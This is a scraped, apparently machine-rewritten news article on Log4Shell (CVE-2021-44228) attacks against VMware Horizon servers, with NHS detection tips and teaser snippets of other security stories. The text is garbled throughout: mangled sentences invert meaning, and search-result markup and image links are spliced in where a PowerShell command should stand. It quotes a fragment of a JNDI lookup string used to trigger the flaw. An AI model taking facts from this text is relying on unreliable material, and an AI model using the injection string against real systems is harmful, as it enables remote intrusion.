https://safirsoft.com British and US officials warn that patch systems are vulnerable to critical Log4j flaws

One of the most serious vulnerabilities in recent years, Log4Shell is still being attacked. It allows them to get full control, and exploitation. Damaged systems warn of the UK's public healthcare system.

CVE-2021-44228 is one of the most dangerous vulnerabilities discovered in the past few years. It's in Log4J, a system of logs of code used in thousands or millions of third-party apps and websites. This means that there is a huge base of vulnerable systems. In addition, the vulnerability is very easy to exploit and allows attackers to install web shells, which provide command windows for executing highly privileged commands on compromised servers.

Log4j tools. The remote code execution flaw in Log4j became apparent in December after the exploit code was released before a patch became available. Soon, malicious hackers began effectively exploiting CVE-2021-44228 to infiltrate sensitive systems.

Attacks, including those targeting VMware Horizon, have persisted since then. It affected the networks, British NHS officials wrote. They continue to provide guidance on specific steps affected organizations can take to reduce the threat. Most important is the recommendation to install updates that VMware has released for its Horizon product, which gives organizations a virtualization tool: desktop and application capabilities using corporate virtualization technology. vulnerable organizations can seek to identify potential attacks they may have experienced.

READ MORE Why the Equifax breach may be the worst leak of personal information, a day after the Federal Trade Commission warned consumers to overhaul weak regulations to prevent Equifax's fate.In 2019, the credit reporting agency agreed to pay $575 million to cover costs for the Federal Trade Commission for failing to fix a similarly critical vulnerability in a different program called Apache Struts When an unknown attacker exploited a vulnerability on the Equifax network, it compromised the sensitive data of 143 million people, making it one of the worst data breaches of all time. FTC officials said: “The FTC intends to use its full legal authority to sue companies that take reasonable steps to protect consumer data from future exposure. mine for Log4j or similar known vulnerabilities".

The NHS is at least the second organization to find abuses targeting VMware products. Last month, researchers reported that attackers targeted systems running VMware VCenter to install Conti ransomware.

Attacks targeting unmodified VMware Horizon servers targeted use of the NPS service source. Run by one-time Log4Shell similar to ${jndi:ldap://example.com..' This attack exploits the Log4Shell vulnerability in the Apache Tomcat service built into VMware Horizon. It then executes the following PowerShell command from ws_TomcatService.exe: "  https://safirsoft.com US warns <b>that</b> <b>patch</b> <b>systems</b> are <b>vulnerable</b> to <b>critical</b> <b>Log4j</b> vulnerabilities ZoomNHS

After a few more steps, attackers can install a web shell that has a permanent connection to the server they control. Here is an image of the attack: https://safirsoft.com <b>British</b> <b>and</b> US <b>officials</b> <b>warn</b> <b>that</b> <b>patch</b> <b>systems</b> are <b>vulnerable</b> to <b>Log4j</b> vulnerabilities.” Srcset = https://cdn.arstechnica.net/wp-content/uploads/2022/01/attacker-diagram-nhs-1280x503.png 2x ZoomNHS

Tips added:

Must Organizations search for the following:

Evidence of abnormal processes ws_TomcatService.exe Any powershell.exe process that contains "VMBlastSG" in the command line file changes to VMware\VMware View\Server\lib\abblastgate\-worker. js' - This file is generally overwritten during the upgrade, and is not changed.

The Praetorian Security Company released the tool Friday to identify released systems that are vulnerable to widespread attack.



https://safirsoft.com Safari and iOS forms display browsing activity and ID in real time

Safari and iOS forms display browsing activity and ID in real time

It is easy to exploit unresolved problems that violate the basic rules of the Internet. This breach is due to errors that reveal user identity and bro...
https://safirsoft.com Microsoft warns of damaging Ukrainian disk cleaners

Microsoft warns of damaging Ukrainian disk cleaners

Ukrainian officials blamed Russia for the attacks that escalated geopolitical tensions, and Ukraine and NATO have done so. Do not agree with the Kreml...
https://safirsoft.com Back cover not detected for Windows, macOS, and Linux

Back cover not detected for Windows, macOS, and Linux

SysJoker cross-platform previously unseen from Advanced Threat Player.

Researchers have discovered an invisible wallpaper that was originally...

https://safirsoft.com North Korean hackers stole nearly $400 million in cryptocurrency last year

North Korean hackers stole nearly $400 million in cryptocurrency last year

Weak startups are the “year of advertising” thanks to the surge in the value of cryptocurrencies.

The past year has seen a huge increase ...

https://safirsoft.com Russia says it thwarted REvil Ransomware

Russia says it thwarted REvil Ransomware

REvil the "big game hunter" has threatened the world with large-scale attacks for three years.
Russian law enforcement officials announced Friday...
https://safirsoft.com Ukraine says government websites have been the target of large-scale cyberattacks

Ukraine says government websites have been the target of large-scale cyberattacks

Kiev did not blame at least 70 sites for the disturbance.

Ukraine says it has been the target of a "large-scale cyber attack" after shutting ...